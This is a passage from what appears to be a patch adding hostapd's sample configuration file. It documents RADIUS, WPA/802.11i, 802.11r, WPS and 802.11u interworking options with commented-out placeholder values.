++ ++# Enable/disable different EAP-FAST provisioning modes: ++#0 = provisioning disabled ++#1 = only anonymous provisioning allowed ++#2 = only authenticated provisioning allowed ++#3 = both provisioning modes allowed (default) ++#eap_fast_prov=3 ++ ++# EAP-FAST PAC-Key lifetime in seconds (hard limit) ++#pac_key_lifetime=604800 ++ ++# EAP-FAST PAC-Key refresh time in seconds (soft limit on remaining hard ++# limit). The server will generate a new PAC-Key when this number of seconds ++# (or fewer) of the lifetime remains. ++#pac_key_refresh_time=86400 ++ ++# EAP-SIM and EAP-AKA protected success/failure indication using AT_RESULT_IND ++# (default: 0 = disabled). ++#eap_sim_aka_result_ind=1 ++ ++# Trusted Network Connect (TNC) ++# If enabled, TNC validation will be required before the peer is allowed to ++# connect. Note: This is only used with EAP-TTLS and EAP-FAST. If any other ++# EAP method is enabled, the peer will be allowed to connect without TNC. ++#tnc=1 ++ ++# EAP Re-authentication Protocol (ERP) - RFC 6696 ++# ++# Whether to enable ERP on the EAP server. ++#eap_server_erp=1 ++ ++##### IEEE 802.11f - Inter-Access Point Protocol (IAPP) ####################### ++ ++# Interface to be used for IAPP broadcast packets ++#iapp_interface=eth0 ++ ++ ++##### RADIUS client configuration ############################################# ++# for IEEE 802.1X with external Authentication Server, IEEE 802.11 ++# authentication with external ACL for MAC addresses, and accounting ++ ++# The own IP address of the access point (used as NAS-IP-Address) ++own_ip_addr=127.0.0.1 ++ ++# NAS-Identifier string for RADIUS messages. When used, this should be unique ++# to the NAS within the scope of the RADIUS server. Please note that hostapd ++# uses a separate RADIUS client for each BSS and as such, a unique ++# nas_identifier value should be configured separately for each BSS. This is ++# particularly important for cases where RADIUS accounting is used ++# (Accounting-On/Off messages are interpreted as clearing all ongoing sessions ++# and that may get interpreted as applying to all BSSes if the same ++# NAS-Identifier value is used.) For example, a fully qualified domain name ++# prefixed with a unique identifier of the BSS (e.g., BSSID) can be used here. ++# ++# When using IEEE 802.11r, nas_identifier must be set and must be between 1 and ++# 48 octets long. ++# ++# It is mandatory to configure either own_ip_addr or nas_identifier to be ++# compliant with the RADIUS protocol. When using RADIUS accounting, it is ++# strongly recommended that nas_identifier is set to a unique value for each ++# BSS. ++#nas_identifier=ap.example.com ++ ++# RADIUS client forced local IP address for the access point ++# Normally the local IP address is determined automatically based on configured ++# IP addresses, but this field can be used to force a specific address to be ++# used, e.g., when the device has multiple IP addresses. ++#radius_client_addr=127.0.0.1 ++ ++# RADIUS authentication server ++#auth_server_addr=127.0.0.1 ++#auth_server_port=1812 ++#auth_server_shared_secret=secret ++ ++# RADIUS accounting server ++#acct_server_addr=127.0.0.1 ++#acct_server_port=1813 ++#acct_server_shared_secret=secret ++ ++# Secondary RADIUS servers; to be used if primary one does not reply to ++# RADIUS packets. These are optional and there can be more than one secondary ++# server listed. ++#auth_server_addr=127.0.0.2 ++#auth_server_port=1812 ++#auth_server_shared_secret=secret2 ++# ++#acct_server_addr=127.0.0.2 ++#acct_server_port=1813 ++#acct_server_shared_secret=secret2 ++ ++# Retry interval for trying to return to the primary RADIUS server (in ++# seconds). RADIUS client code will automatically try to use the next server ++# when the current server is not replying to requests. If this interval is set, ++# primary server will be retried after configured amount of time even if the ++# currently used secondary server is still working. ++#radius_retry_primary_interval=600 ++ ++ ++# Interim accounting update interval ++# If this is set (larger than 0) and acct_server is configured, hostapd will ++# send interim accounting updates every N seconds. Note: if set, this overrides ++# possible Acct-Interim-Interval attribute in Access-Accept message. Thus, this ++# value should not be configured in hostapd.conf, if RADIUS server is used to ++# control the interim interval. ++# This value should not be less 600 (10 minutes) and must not be less than ++# 60 (1 minute). ++#radius_acct_interim_interval=600 ++ ++# Request Chargeable-User-Identity (RFC 4372) ++# This parameter can be used to configure hostapd to request CUI from the ++# RADIUS server by including Chargeable-User-Identity attribute into ++# Access-Request packets. ++#radius_request_cui=1 ++ ++# Dynamic VLAN mode; allow RADIUS authentication server to decide which VLAN ++# is used for the stations. This information is parsed from following RADIUS ++# attributes based on RFC 3580 and RFC 2868: Tunnel-Type (value 13 = VLAN), ++# Tunnel-Medium-Type (value 6 = IEEE 802), Tunnel-Private-Group-ID (value ++# VLANID as a string). Optionally, the local MAC ACL list (accept_mac_file) can ++# be used to set static client MAC address to VLAN ID mapping. ++# 0 = disabled (default) ++# 1 = option; use default interface if RADIUS server does not include VLAN ID ++# 2 = required; reject authentication if RADIUS server does not include VLAN ID ++#dynamic_vlan=0 ++ ++# Per-Station AP_VLAN interface mode ++# If enabled, each station is assigned its own AP_VLAN interface. ++# This implies per-station group keying and ebtables filtering of inter-STA ++# traffic (when passed through the AP). ++# If the sta is not assigned to any VLAN, then its AP_VLAN interface will be ++# added to the bridge given by the "bridge" configuration option (see above). ++# Otherwise, it will be added to the per-VLAN bridge. ++# 0 = disabled (default) ++# 1 = enabled ++#per_sta_vif=0 ++ ++# VLAN interface list for dynamic VLAN mode is read from a separate text file. ++# This list is used to map VLAN ID from the RADIUS server to a network ++# interface. Each station is bound to one interface in the same way as with ++# multiple BSSIDs or SSIDs. Each line in this text file is defining a new ++# interface and the line must include VLAN ID and interface name separated by ++# white space (space or tab). ++# If no entries are provided by this file, the station is statically mapped ++# to . interfaces. ++#vlan_file=/etc/hostapd.vlan ++ ++# Interface where 802.1q tagged packets should appear when a RADIUS server is ++# used to determine which VLAN a station is on. hostapd creates a bridge for ++# each VLAN. Then hostapd adds a VLAN interface (associated with the interface ++# indicated by 'vlan_tagged_interface') and the appropriate wireless interface ++# to the bridge. ++#vlan_tagged_interface=eth0 ++ ++# Bridge (prefix) to add the wifi and the tagged interface to. This gets the ++# VLAN ID appended. It defaults to brvlan%d if no tagged interface is given ++# and br%s.%d if a tagged interface is given, provided %s = tagged interface ++# and %d = VLAN ID. ++#vlan_bridge=brvlan ++ ++# When hostapd creates a VLAN interface on vlan_tagged_interfaces, it needs ++# to know how to name it. ++# 0 = vlan, e.g., vlan1 ++# 1 = ., e.g. eth0.1 ++#vlan_naming=0 ++ ++# Arbitrary RADIUS attributes can be added into Access-Request and ++# Accounting-Request packets by specifying the contents of the attributes with ++# the following configuration parameters. There can be multiple of these to ++# add multiple attributes. These parameters can also be used to override some ++# of the attributes added automatically by hostapd. ++# Format: [:] ++# attr_id: RADIUS attribute type (e.g., 26 = Vendor-Specific) ++# syntax: s = string (UTF-8), d = integer, x = octet string ++# value: attribute value in format indicated by the syntax ++# If syntax and value parts are omitted, a null value (single 0x00 octet) is ++# used. ++# ++# Additional Access-Request attributes ++# radius_auth_req_attr=[:] ++# Examples: ++# Operator-Name = "Operator" ++#radius_auth_req_attr=126:s:Operator ++# Service-Type = Framed (2) ++#radius_auth_req_attr=6:d:2 ++# Connect-Info = "testing" (this overrides the automatically generated value) ++#radius_auth_req_attr=77:s:testing ++# Same Connect-Info value set as a hexdump ++#radius_auth_req_attr=77:x:74657374696e67 ++ ++# ++# Additional Accounting-Request attributes ++# radius_acct_req_attr=[:] ++# Examples: ++# Operator-Name = "Operator" ++#radius_acct_req_attr=126:s:Operator ++ ++# Dynamic Authorization Extensions (RFC 5176) ++# This mechanism can be used to allow dynamic changes to user session based on ++# commands from a RADIUS server (or some other disconnect client that has the ++# needed session information). For example, Disconnect message can be used to ++# request an associated station to be disconnected. ++# ++# This is disabled by default. Set radius_das_port to non-zero UDP port ++# number to enable. ++#radius_das_port=3799 ++# ++# DAS client (the host that can send Disconnect/CoA requests) and shared secret ++#radius_das_client=192.168.1.123 shared secret here ++# ++# DAS Event-Timestamp time window in seconds ++#radius_das_time_window=300 ++# ++# DAS require Event-Timestamp ++#radius_das_require_event_timestamp=1 ++# ++# DAS require Message-Authenticator ++#radius_das_require_message_authenticator=1 ++ ++##### RADIUS authentication server configuration ############################## ++ ++# hostapd can be used as a RADIUS authentication server for other hosts. This ++# requires that the integrated EAP server is also enabled and both ++# authentication services are sharing the same configuration. ++ ++# File name of the RADIUS clients configuration for the RADIUS server. If this ++# commented out, RADIUS server is disabled. ++#radius_server_clients=/etc/hostapd.radius_clients ++ ++# The UDP port number for the RADIUS authentication server ++#radius_server_auth_port=1812 ++ ++# The UDP port number for the RADIUS accounting server ++# Commenting this out or setting this to 0 can be used to disable RADIUS ++# accounting while still enabling RADIUS authentication. ++#radius_server_acct_port=1813 ++ ++# Use IPv6 with RADIUS server (IPv4 will also be supported using IPv6 API) ++#radius_server_ipv6=1 ++ ++ ++##### WPA/IEEE 802.11i configuration ########################################## ++ ++# Enable WPA. Setting this variable configures the AP to require WPA (either ++# WPA-PSK or WPA-RADIUS/EAP based on other configuration). For WPA-PSK, either ++# wpa_psk or wpa_passphrase must be set and wpa_key_mgmt must include WPA-PSK. ++# Instead of wpa_psk / wpa_passphrase, wpa_psk_radius might suffice. ++# For WPA-RADIUS/EAP, ieee8021x must be set (but without dynamic WEP keys), ++# RADIUS authentication server must be configured, and WPA-EAP must be included ++# in wpa_key_mgmt. ++# This field is a bit field that can be used to enable WPA (IEEE 802.11i/D3.0) ++# and/or WPA2 (full IEEE 802.11i/RSN): ++# bit0 = WPA ++# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled) ++#wpa=1 ++ ++# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit ++# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase ++# (8..63 characters) that will be converted to PSK. This conversion uses SSID ++# so the PSK changes when ASCII passphrase is used and the SSID is changed. ++# wpa_psk (dot11RSNAConfigPSKValue) ++# wpa_passphrase (dot11RSNAConfigPSKPassPhrase) ++#wpa_psk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef ++#wpa_passphrase=secret passphrase ++ ++# Optionally, WPA PSKs can be read from a separate text file (containing list ++# of (PSK,MAC address) pairs. This allows more than one PSK to be configured. ++# Use absolute path name to make sure that the files can be read on SIGHUP ++# configuration reloads. ++#wpa_psk_file=/etc/hostapd.wpa_psk ++ ++# Optionally, WPA passphrase can be received from RADIUS authentication server ++# This requires macaddr_acl to be set to 2 (RADIUS) ++# 0 = disabled (default) ++# 1 = optional; use default passphrase/psk if RADIUS server does not include ++# Tunnel-Password ++# 2 = required; reject authentication if RADIUS server does not include ++# Tunnel-Password ++#wpa_psk_radius=0 ++ ++# Set of accepted key management algorithms (WPA-PSK, WPA-EAP, or both). The ++# entries are separated with a space. WPA-PSK-SHA256 and WPA-EAP-SHA256 can be ++# added to enable SHA256-based stronger algorithms. ++# (dot11RSNAConfigAuthenticationSuitesTable) ++#wpa_key_mgmt=WPA-PSK WPA-EAP ++ ++# Set of accepted cipher suites (encryption algorithms) for pairwise keys ++# (unicast packets). This is a space separated list of algorithms: ++# CCMP = AES in Counter mode with CBC-MAC [RFC 3610, IEEE 802.11i/D7.0] ++# TKIP = Temporal Key Integrity Protocol [IEEE 802.11i/D7.0] ++# Group cipher suite (encryption algorithm for broadcast and multicast frames) ++# is automatically selected based on this configuration. If only CCMP is ++# allowed as the pairwise cipher, group cipher will also be CCMP. Otherwise, ++# TKIP will be used as the group cipher. ++# (dot11RSNAConfigPairwiseCiphersTable) ++# Pairwise cipher for WPA (v1) (default: TKIP) ++#wpa_pairwise=TKIP CCMP ++# Pairwise cipher for RSN/WPA2 (default: use wpa_pairwise value) ++#rsn_pairwise=CCMP ++ ++# Time interval for rekeying GTK (broadcast/multicast encryption keys) in ++# seconds. (dot11RSNAConfigGroupRekeyTime) ++#wpa_group_rekey=600 ++ ++# Rekey GTK when any STA that possesses the current GTK is leaving the BSS. ++# (dot11RSNAConfigGroupRekeyStrict) ++#wpa_strict_rekey=1 ++ ++# Time interval for rekeying GMK (master key used internally to generate GTKs ++# (in seconds). ++#wpa_gmk_rekey=86400 ++ ++# Maximum lifetime for PTK in seconds. This can be used to enforce rekeying of ++# PTK to mitigate some attacks against TKIP deficiencies. ++#wpa_ptk_rekey=600 ++ ++# Enable IEEE 802.11i/RSN/WPA2 pre-authentication. This is used to speed up ++# roaming be pre-authenticating IEEE 802.1X/EAP part of the full RSN ++# authentication and key handshake before actually associating with a new AP. ++# (dot11RSNAPreauthenticationEnabled) ++#rsn_preauth=1 ++# ++# Space separated list of interfaces from which pre-authentication frames are ++# accepted (e.g., 'eth0' or 'eth0 wlan0wds0'. This list should include all ++# interface that are used for connections to other APs. This could include ++# wired interfaces and WDS links. The normal wireless data interface towards ++# associated stations (e.g., wlan0) should not be added, since ++# pre-authentication is only used with APs other than the currently associated ++# one. ++#rsn_preauth_interfaces=eth0 ++ ++# peerkey: Whether PeerKey negotiation for direct links (IEEE 802.11e) is ++# allowed. This is only used with RSN/WPA2. ++# 0 = disabled (default) ++# 1 = enabled ++#peerkey=1 ++ ++# ieee80211w: Whether management frame protection (MFP) is enabled ++# 0 = disabled (default) ++# 1 = optional ++# 2 = required ++#ieee80211w=0 ++ ++# Group management cipher suite ++# Default: AES-128-CMAC (BIP) ++# Other options (depending on driver support): ++# BIP-GMAC-128 ++# BIP-GMAC-256 ++# BIP-CMAC-256 ++# Note: All the stations connecting to the BSS will also need to support the ++# selected cipher. The default AES-128-CMAC is the only option that is commonly ++# available in deployed devices. ++#group_mgmt_cipher=AES-128-CMAC ++ ++# Association SA Query maximum timeout (in TU = 1.024 ms; for MFP) ++# (maximum time to wait for a SA Query response) ++# dot11AssociationSAQueryMaximumTimeout, 1...4294967295 ++#assoc_sa_query_max_timeout=1000 ++ ++# Association SA Query retry timeout (in TU = 1.024 ms; for MFP) ++# (time between two subsequent SA Query requests) ++# dot11AssociationSAQueryRetryTimeout, 1...4294967295 ++#assoc_sa_query_retry_timeout=201 ++ ++# disable_pmksa_caching: Disable PMKSA caching ++# This parameter can be used to disable caching of PMKSA created through EAP ++# authentication. RSN preauthentication may still end up using PMKSA caching if ++# it is enabled (rsn_preauth=1). ++# 0 = PMKSA caching enabled (default) ++# 1 = PMKSA caching disabled ++#disable_pmksa_caching=0 ++ ++# okc: Opportunistic Key Caching (aka Proactive Key Caching) ++# Allow PMK cache to be shared opportunistically among configured interfaces ++# and BSSes (i.e., all configurations within a single hostapd process). ++# 0 = disabled (default) ++# 1 = enabled ++#okc=1 ++ ++# SAE threshold for anti-clogging mechanism (dot11RSNASAEAntiCloggingThreshold) ++# This parameter defines how many open SAE instances can be in progress at the ++# same time before the anti-clogging mechanism is taken into use. ++#sae_anti_clogging_threshold=5 ++ ++# Enabled SAE finite cyclic groups ++# SAE implementation are required to support group 19 (ECC group defined over a ++# 256-bit prime order field). All groups that are supported by the ++# implementation are enabled by default. This configuration parameter can be ++# used to specify a limited set of allowed groups. The group values are listed ++# in the IANA registry: ++# http://www.iana.org/assignments/ipsec-registry/ipsec-registry.xml#ipsec-registry-9 ++#sae_groups=19 20 21 25 26 ++ ++##### IEEE 802.11r configuration ############################################## ++ ++# Mobility Domain identifier (dot11FTMobilityDomainID, MDID) ++# MDID is used to indicate a group of APs (within an ESS, i.e., sharing the ++# same SSID) between which a STA can use Fast BSS Transition. ++# 2-octet identifier as a hex string. ++#mobility_domain=a1b2 ++ ++# PMK-R0 Key Holder identifier (dot11FTR0KeyHolderID) ++# 1 to 48 octet identifier. ++# This is configured with nas_identifier (see RADIUS client section above). ++ ++# Default lifetime of the PMK-RO in minutes; range 1..65535 ++# (dot11FTR0KeyLifetime) ++#r0_key_lifetime=10000 ++ ++# PMK-R1 Key Holder identifier (dot11FTR1KeyHolderID) ++# 6-octet identifier as a hex string. ++# Defaults to BSSID. ++#r1_key_holder=000102030405 ++ ++# Reassociation deadline in time units (TUs / 1.024 ms; range 1000..65535) ++# (dot11FTReassociationDeadline) ++#reassociation_deadline=1000 ++ ++# List of R0KHs in the same Mobility Domain ++# format: <128-bit key as hex string> ++# This list is used to map R0KH-ID (NAS Identifier) to a destination MAC ++# address when requesting PMK-R1 key from the R0KH that the STA used during the ++# Initial Mobility Domain Association. ++#r0kh=02:01:02:03:04:05 r0kh-1.example.com 000102030405060708090a0b0c0d0e0f ++#r0kh=02:01:02:03:04:06 r0kh-2.example.com 00112233445566778899aabbccddeeff ++# And so on.. One line per R0KH. ++ ++# List of R1KHs in the same Mobility Domain ++# format: <128-bit key as hex string> ++# This list is used to map R1KH-ID to a destination MAC address when sending ++# PMK-R1 key from the R0KH. This is also the list of authorized R1KHs in the MD ++# that can request PMK-R1 keys. ++#r1kh=02:01:02:03:04:05 02:11:22:33:44:55 000102030405060708090a0b0c0d0e0f ++#r1kh=02:01:02:03:04:06 02:11:22:33:44:66 00112233445566778899aabbccddeeff ++# And so on.. One line per R1KH. ++ ++# Whether PMK-R1 push is enabled at R0KH ++# 0 = do not push PMK-R1 to all configured R1KHs (default) ++# 1 = push PMK-R1 to all configured R1KHs whenever a new PMK-R0 is derived ++#pmk_r1_push=1 ++ ++# Whether to enable FT-over-DS ++# 0 = FT-over-DS disabled ++# 1 = FT-over-DS enabled (default) ++#ft_over_ds=1 ++ ++##### Neighbor table ########################################################## ++# Maximum number of entries kept in AP table (either for neigbor table or for ++# detecting Overlapping Legacy BSS Condition). The oldest entry will be ++# removed when adding a new entry that would make the list grow over this ++# limit. Note! WFA certification for IEEE 802.11g requires that OLBC is ++# enabled, so this field should not be set to 0 when using IEEE 802.11g. ++# default: 255 ++#ap_table_max_size=255 ++ ++# Number of seconds of no frames received after which entries may be deleted ++# from the AP table. Since passive scanning is not usually performed frequently ++# this should not be set to very small value. In addition, there is no ++# guarantee that every scan cycle will receive beacon frames from the ++# neighboring APs. ++# default: 60 ++#ap_table_expiration_time=3600 ++ ++# Maximum number of stations to track on the operating channel ++# This can be used to detect dualband capable stations before they have ++# associated, e.g., to provide guidance on which colocated BSS to use. ++# Default: 0 (disabled) ++#track_sta_max_num=100 ++ ++# Maximum age of a station tracking entry in seconds ++# Default: 180 ++#track_sta_max_age=180 ++ ++# Do not reply to group-addressed Probe Request from a station that was seen on ++# another radio. ++# Default: Disabled ++# ++# This can be used with enabled track_sta_max_num configuration on another ++# interface controlled by the same hostapd process to restrict Probe Request ++# frame handling from replying to group-addressed Probe Request frames from a ++# station that has been detected to be capable of operating on another band, ++# e.g., to try to reduce likelihood of the station selecting a 2.4 GHz BSS when ++# the AP operates both a 2.4 GHz and 5 GHz BSS concurrently. ++# ++# Note: Enabling this can cause connectivity issues and increase latency for ++# discovering the AP. ++#no_probe_resp_if_seen_on=wlan1 ++ ++# Reject authentication from a station that was seen on another radio. ++# Default: Disabled ++# ++# This can be used with enabled track_sta_max_num configuration on another ++# interface controlled by the same hostapd process to reject authentication ++# attempts from a station that has been detected to be capable of operating on ++# another band, e.g., to try to reduce likelihood of the station selecting a ++# 2.4 GHz BSS when the AP operates both a 2.4 GHz and 5 GHz BSS concurrently. ++# ++# Note: Enabling this can cause connectivity issues and increase latency for ++# connecting with the AP. ++#no_auth_if_seen_on=wlan1 ++ ++##### Wi-Fi Protected Setup (WPS) ############################################# ++ ++# WPS state ++# 0 = WPS disabled (default) ++# 1 = WPS enabled, not configured ++# 2 = WPS enabled, configured ++#wps_state=2 ++ ++# Whether to manage this interface independently from other WPS interfaces ++# By default, a single hostapd process applies WPS operations to all configured ++# interfaces. This parameter can be used to disable that behavior for a subset ++# of interfaces. If this is set to non-zero for an interface, WPS commands ++# issued on that interface do not apply to other interfaces and WPS operations ++# performed on other interfaces do not affect this interface. ++#wps_independent=0 ++ ++# AP can be configured into a locked state where new WPS Registrar are not ++# accepted, but previously authorized Registrars (including the internal one) ++# can continue to add new Enrollees. ++#ap_setup_locked=1 ++ ++# Universally Unique IDentifier (UUID; see RFC 4122) of the device ++# This value is used as the UUID for the internal WPS Registrar. If the AP ++# is also using UPnP, this value should be set to the device's UPnP UUID. ++# If not configured, UUID will be generated based on the local MAC address. ++#uuid=12345678-9abc-def0-1234-56789abcdef0 ++ ++# Note: If wpa_psk_file is set, WPS is used to generate random, per-device PSKs ++# that will be appended to the wpa_psk_file. If wpa_psk_file is not set, the ++# default PSK (wpa_psk/wpa_passphrase) will be delivered to Enrollees. Use of ++# per-device PSKs is recommended as the more secure option (i.e., make sure to ++# set wpa_psk_file when using WPS with WPA-PSK). ++ ++# When an Enrollee requests access to the network with PIN method, the Enrollee ++# PIN will need to be entered for the Registrar. PIN request notifications are ++# sent to hostapd ctrl_iface monitor. In addition, they can be written to a ++# text file that could be used, e.g., to populate the AP administration UI with ++# pending PIN requests. If the following variable is set, the PIN requests will ++# be written to the configured file. ++#wps_pin_requests=/var/run/hostapd_wps_pin_requests ++ ++# Device Name ++# User-friendly description of device; up to 32 octets encoded in UTF-8 ++#device_name=Wireless AP ++ ++# Manufacturer ++# The manufacturer of the device (up to 64 ASCII characters) ++#manufacturer=Company ++ ++# Model Name ++# Model of the device (up to 32 ASCII characters) ++#model_name=WAP ++ ++# Model Number ++# Additional device description (up to 32 ASCII characters) ++#model_number=123 ++ ++# Serial Number ++# Serial number of the device (up to 32 characters) ++#serial_number=12345 ++ ++# Primary Device Type ++# Used format: -- ++# categ = Category as an integer value ++# OUI = OUI and type octet as a 4-octet hex-encoded value; 0050F204 for ++# default WPS OUI ++# subcateg = OUI-specific Sub Category as an integer value ++# Examples: ++# 1-0050F204-1 (Computer / PC) ++# 1-0050F204-2 (Computer / Server) ++# 5-0050F204-1 (Storage / NAS) ++# 6-0050F204-1 (Network Infrastructure / AP) ++#device_type=6-0050F204-1 ++ ++# OS Version ++# 4-octet operating system version number (hex string) ++#os_version=01020300 ++ ++# Config Methods ++# List of the supported configuration methods ++# Available methods: usba ethernet label display ext_nfc_token int_nfc_token ++# nfc_interface push_button keypad virtual_display physical_display ++# virtual_push_button physical_push_button ++#config_methods=label virtual_display virtual_push_button keypad ++ ++# WPS capability discovery workaround for PBC with Windows 7 ++# Windows 7 uses incorrect way of figuring out AP's WPS capabilities by acting ++# as a Registrar and using M1 from the AP. The config methods attribute in that ++# message is supposed to indicate only the configuration method supported by ++# the AP in Enrollee role, i.e., to add an external Registrar. For that case, ++# PBC shall not be used and as such, the PushButton config method is removed ++# from M1 by default. If pbc_in_m1=1 is included in the configuration file, ++# the PushButton config method is left in M1 (if included in config_methods ++# parameter) to allow Windows 7 to use PBC instead of PIN (e.g., from a label ++# in the AP). ++#pbc_in_m1=1 ++ ++# Static access point PIN for initial configuration and adding Registrars ++# If not set, hostapd will not allow external WPS Registrars to control the ++# access point. The AP PIN can also be set at runtime with hostapd_cli ++# wps_ap_pin command. Use of temporary (enabled by user action) and random ++# AP PIN is much more secure than configuring a static AP PIN here. As such, ++# use of the ap_pin parameter is not recommended if the AP device has means for ++# displaying a random PIN. ++#ap_pin=12345670 ++ ++# Skip building of automatic WPS credential ++# This can be used to allow the automatically generated Credential attribute to ++# be replaced with pre-configured Credential(s). ++#skip_cred_build=1 ++ ++# Additional Credential attribute(s) ++# This option can be used to add pre-configured Credential attributes into M8 ++# message when acting as a Registrar. If skip_cred_build=1, this data will also ++# be able to override the Credential attribute that would have otherwise been ++# automatically generated based on network configuration. This configuration ++# option points to an external file that much contain the WPS Credential ++# attribute(s) as binary data. ++#extra_cred=hostapd.cred ++ ++# Credential processing ++# 0 = process received credentials internally (default) ++# 1 = do not process received credentials; just pass them over ctrl_iface to ++# external program(s) ++# 2 = process received credentials internally and pass them over ctrl_iface ++# to external program(s) ++# Note: With wps_cred_processing=1, skip_cred_build should be set to 1 and ++# extra_cred be used to provide the Credential data for Enrollees. ++# ++# wps_cred_processing=1 will disabled automatic updates of hostapd.conf file ++# both for Credential processing and for marking AP Setup Locked based on ++# validation failures of AP PIN. An external program is responsible on updating ++# the configuration appropriately in this case. ++#wps_cred_processing=0 ++ ++# AP Settings Attributes for M7 ++# By default, hostapd generates the AP Settings Attributes for M7 based on the ++# current configuration. It is possible to override this by providing a file ++# with pre-configured attributes. This is similar to extra_cred file format, ++# but the AP Settings attributes are not encapsulated in a Credential ++# attribute. ++#ap_settings=hostapd.ap_settings ++ ++# WPS UPnP interface ++# If set, support for external Registrars is enabled. ++#upnp_iface=br0 ++ ++# Friendly Name (required for UPnP) ++# Short description for end use. Should be less than 64 characters. ++#friendly_name=WPS Access Point ++ ++# Manufacturer URL (optional for UPnP) ++#manufacturer_url=http://www.example.com/ ++ ++# Model Description (recommended for UPnP) ++# Long description for end user. Should be less than 128 characters. ++#model_description=Wireless Access Point ++ ++# Model URL (optional for UPnP) ++#model_url=http://www.example.com/model/ ++ ++# Universal Product Code (optional for UPnP) ++# 12-digit, all-numeric code that identifies the consumer package. ++#upc=123456789012 ++ ++# WPS RF Bands (a = 5G, b = 2.4G, g = 2.4G, ag = dual band, ad = 60 GHz) ++# This value should be set according to RF band(s) supported by the AP if ++# hw_mode is not set. For dual band dual concurrent devices, this needs to be ++# set to ag to allow both RF bands to be advertized. ++#wps_rf_bands=ag ++ ++# NFC password token for WPS ++# These parameters can be used to configure a fixed NFC password token for the ++# AP. This can be generated, e.g., with nfc_pw_token from wpa_supplicant. When ++# these parameters are used, the AP is assumed to be deployed with a NFC tag ++# that includes the matching NFC password token (e.g., written based on the ++# NDEF record from nfc_pw_token). ++# ++#wps_nfc_dev_pw_id: Device Password ID (16..65535) ++#wps_nfc_dh_pubkey: Hexdump of DH Public Key ++#wps_nfc_dh_privkey: Hexdump of DH Private Key ++#wps_nfc_dev_pw: Hexdump of Device Password ++ ++##### Wi-Fi Direct (P2P) ###################################################### ++ ++# Enable P2P Device management ++#manage_p2p=1 ++ ++# Allow cross connection ++#allow_cross_connection=1 ++ ++#### TDLS (IEEE 802.11z-2010) ################################################# ++ ++# Prohibit use of TDLS in this BSS ++#tdls_prohibit=1 ++ ++# Prohibit use of TDLS Channel Switching in this BSS ++#tdls_prohibit_chan_switch=1 ++ ++##### IEEE 802.11v-2011 ####################################################### ++ ++# Time advertisement ++# 0 = disabled (default) ++# 2 = UTC time at which the TSF timer is 0 ++#time_advertisement=2 ++ ++# Local time zone as specified in 8.3 of IEEE Std 1003.1-2004: ++# stdoffset[dst[offset][,start[/time],end[/time]]] ++#time_zone=EST5 ++ ++# WNM-Sleep Mode (extended sleep mode for stations) ++# 0 = disabled (default) ++# 1 = enabled (allow stations to use WNM-Sleep Mode) ++#wnm_sleep_mode=1 ++ ++# BSS Transition Management ++# 0 = disabled (default) ++# 1 = enabled ++#bss_transition=1 ++ ++# Proxy ARP ++# 0 = disabled (default) ++# 1 = enabled ++#proxy_arp=1 ++ ++# IPv6 Neighbor Advertisement multicast-to-unicast conversion ++# This can be used with Proxy ARP to allow multicast NAs to be forwarded to ++# associated STAs using link layer unicast delivery. ++# 0 = disabled (default) ++# 1 = enabled ++#na_mcast_to_ucast=0 ++ ++##### IEEE 802.11u-2011 ####################################################### ++ ++# Enable Interworking service ++#interworking=1 ++ ++# Access Network Type ++# 0 = Private network ++# 1 = Private network with guest access ++# 2 = Chargeable public network ++# 3 = Free public network ++# 4 = Personal device network ++# 5 = Emergency services only network ++# 14 = Test or experimental ++# 15 = Wildcard ++#access_network_type=0 ++ ++# Whether the network provides connectivity to the Internet ++# 0 = Unspecified ++# 1 = Network provides connectivity to the Internet ++#internet=1 ++ ++# Additional Step Required for Access ++# Note: This is only used with open network, i.e., ASRA shall ne set to 0 if ++# RSN is used. ++#asra=0 ++ ++# Emergency services reachable ++#esr=0 ++ ++# Unauthenticated emergency service accessible ++#uesa=0 ++ ++# Venue Info (optional) ++# The available values are defined in IEEE Std 802.11u-2011, 7.3.1.34. ++# Example values (group,type): ++# 0,0 = Unspecified ++# 1,7 = Convention Center ++# 1,13 = Coffee Shop ++# 2,0 = Unspecified Business ++# 7,1 Private Residence ++#venue_group=7 ++#venue_type=1 ++ ++# Homogeneous ESS identifier (optional; dot11HESSID) ++# If set, this shall be identifical to one of the BSSIDs in the homogeneous ++# ESS and this shall be set to the same value across all BSSs in homogeneous ++# ESS. ++#hessid=02:03:04:05:06:07 ++ ++# Roaming Consortium List ++# Arbitrary number of Roaming Consortium OIs can be configured with each line ++# adding a new OI to the list. The first three entries are available through ++# Beacon and Probe Response frames. Any additional entry will be available only ++# through ANQP queries. Each OI is between 3 and 15 octets and is configured as ++# a hexstring. ++#roaming_consortium=021122 ++#roaming_consortium=2233445566 ++ ++# Venue Name information ++# This parameter can be used to configure one or more Venue Name Duples for ++# Venue Name ANQP information. Each entry has a two or three character language ++# code (ISO-639) separated by colon from the venue name string. ++# Note that venue_group and venue_type have to be set for Venue Name ++# information to be complete. ++#venue_name=eng:Example venue ++#venue_name=fin:Esimerkkipaikka ++# Alternative format for language:value strings: ++# (double quoted string, printf-escaped string) ++#venue_name=P"eng:Example\nvenue" ++ ++# Network Authentication Type ++# This parameter indicates what type of network authentication is used in the ++# network. ++# format: [redirect URL] ++# Network Authentication Type Indicator values: ++# 00 = Acceptance of terms and conditions ++# 01 = On-line enrollment supported ++# 02 = http/https redirection ++# 03 = DNS redirection ++#network_auth_type=00 ++#network_auth_type=02http://www.example.com/redirect/me/here/ ++ ++# IP Address Type Availability ++# format: <1-octet encoded value as hex str> ++# (ipv4_type & 0x3f) << 2 | (ipv6_type & 0x3) ++# ipv4_type: ++# 0 = Address type not available ++# 1 = Public IPv4 address available ++# 2 = Port-restricted IPv4 address available ++# 3 = Single NATed private IPv4 address available ++# 4 = Double NATed private IPv4 address available ++# 5 = Port-restricted IPv4 address and single NATed IPv4 address available ++# 6 = Port-restricted IPv4 address and double NATed IPv4 address available ++# 7 = Availability of the address type is not known ++# ipv6_type: ++# 0 = Address type not available ++# 1 = Address type available ++# 2 = Availability of the address type not known ++#ipaddr_type_availability=14 ++ ++# Domain Name ++# format: [,] ++#domain_name=example.com,another.example.com,yet-another.example.com ++ ++# 3GPP Cellular Network information ++# format: [;][;...] ++#anqp_3gpp_cell_net=244,91;310,026;234,56 ++ ++# NAI Realm information ++# One or more realm can be advertised. Each nai_realm line adds a new realm to ++# the set. These parameters provide information for stations using Interworking ++# network selection to allow automatic 